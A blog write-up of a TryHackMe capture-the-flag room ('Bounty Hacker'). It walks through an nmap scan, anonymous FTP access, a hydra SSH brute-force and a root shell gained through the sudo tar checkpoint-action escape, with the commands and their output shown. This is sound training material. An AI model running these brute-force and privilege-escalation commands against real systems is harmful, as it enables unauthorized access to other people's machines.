Hello interweb readers! I’ve felt like doing a quick box since I’m quite busy with work these days and its hard to find time to do longer boxes. Anyways, this time I went for ‘Bounty Hacker’ TryhackMe’s room. This is a writeup detailing all my process to root this room, flaws and all. I embrace mistakes and try to learn from them, therefore this post also includes my failed attempts. You have been warned :)
PS: The challenge was to have this box rooted and half documented at the very least during my lunch break and finish the quick writeup later today. Spoiler alert: I was able to, and I’m super happy about it.
We start as usual firing up nmap and running a scan, notice I initially tested the target to see if it responded to ping and it did. Otherwise, I would’ve added -Pn
switch to nmap to avoid pinging the target. So I ran this: sudo nmap -sV -sC -T4 -A -p- 10.10.38.249
While nmap runs I usually open the target IP in the browser to see if anything is being served as a webpage:
Turns out we do have something, they are teasing us a bit with the story behind this room. Which seems related to the popular Cowboy bebop
anime. Which also has AN AMAZING SOUNDTRACK!
Before we move to our friend nmap
allow me to add some music to the post, I truly think Cowboy Bebop’s OST is awesome. Let’s hit play on this song and move on with the hacking:
SEATBELTS - Tank! - Cowboy Bebop OST - Written by Yoko Kanno
Crank that volume up!
Ok enough fooling around, let’s see what that nmap scan returned:
sudo nmap -sV -sC -T4 -A -p- 10.10.38.249
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-02 13:10 EDT
Nmap scan report for 10.10.38.249
Host is up (0.33s latency).
Not shown: 55529 filtered ports, 10003 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.13.0.34
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
| 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|_ 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Linux 2.6.32 - 3.1 (90%), Ubiquiti AirOS 5.5.9 (90%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%), Linux 2.6.32 - 3.13 (89%), Linux 3.0 - 3.2 (89%), Infomir MAG-250 set-top box (89%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (89%), Linux 3.7 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 226.02 ms 10.13.0.1
2 ... 3
4 364.92 ms 10.10.38.249
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1957.43 seconds
One of the results we got brack from the nmap scan, is that the target has an FTP service with anonymous access enabled. Let’s try that:
┌──(kali㉿kali)-[~/Documents/THM/bountyHacker]
└─$ ftp 10.10.38.249
Connected to 10.10.38.249.
220 (vsFTPd 3.0.3)
Name (10.10.38.249:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jun 07 21:47 .
drwxr-xr-x 2 ftp ftp 4096 Jun 07 21:47 ..
-rw-rw-r-- 1 ftp ftp 418 Jun 07 21:41 locks.txt
-rw-rw-r-- 1 ftp ftp 68 Jun 07 21:47 task.txt
226 Directory send OK.
ftp>
It seems we have two files in the FTP server. We download both using get {file_name}
command. If we then open both files we see some interesting data on each of them:
lin
Let’s see if we can use that information next.
At this point, I initially fired up hydra with the locks.txt
as username list and rockyou.txt
as the wordlist. That didn’t work. Then I tried using the the user mentioned in the task.txt
file lin
and instead of using rockyou.txt
as wordlist and I used locks.txt
instead. That took a while but it worked:
We brute-force the SSH login using lin
as username and the locks.txt
file as the wordlist:
hydra -l lin -P locks.txt 10.10.38.249 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-02 15:52:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task
[DATA] attacking ssh://10.10.38.249:22/
[22][ssh] host: 10.10.38.249 login: lin password: THM{REDACTED_HAVE_FUN}
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-02 15:52:43
Once hydra
managed to brute-force his way in, we log in using lin’s credentials and locate the user.txt
flag. Which is conveniently located at the same directory we land after login.
┌──(kali㉿kali)-[~/Documents/THM/bountyHacker]
└─$ ssh lin@10.10.38.249
The authenticity of host '10.10.38.249 (10.10.38.249)' can't be established.
ECDSA key fingerprint is SHA256:fzjl1gnXyEZI9px29GF/tJr+u8o9i88XXfjggSbAgbE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.38.249' (ECDSA) to the list of known hosts.
lin@10.10.38.249's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
83 packages can be updated.
0 updates are security updates.
Last login: Sun Jun 7 22:23:41 2020 from 192.168.0.14
lin@bountyhacker:~/Desktop$ ls
user.txt
lin@bountyhacker:~/Desktop$ cat user.txt
THM{REDACTED_HAVE_FUN}
lin@bountyhacker:~/Desktop$
We need now, to see how we can escalate privileges so we can get the root flag. We start by checking what is the access level of the current user. We doe sudo -l
to see if we have access to anything as sudo (root)
lin@bountyhacker:/tmp$ sudo -l
[sudo] password for lin:
Matching Defaults entries for lin on bountyhacker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User lin may run the following commands on bountyhacker:
(root) /bin/tar
lin@bountyhacker:/tmp$
It seems the user is allowed to run tar
as root. Let’s see if we find any way to exploit that. A good place to look is at GTFObins page.
They have an entry for tar
here.
We are offered a couple of options, the first one is trying to run this command: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
in our case since we know we can run tar
as sudo
we do that:
lin@bountyhacker:/tmp$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
# whoami
root
#
And we got root, now we just need to locate the root.txt flag:
# cd root
# ls
root.txt
# cat root.txt
THM{REDACTED_HAVE_FUN}
#
That’s it. We rooted the box and with just enough time left on my lunch break so I can get some coffee before getting back to work. I hope you enjoyed this quick room as I did.
Thank you and Happy hacking!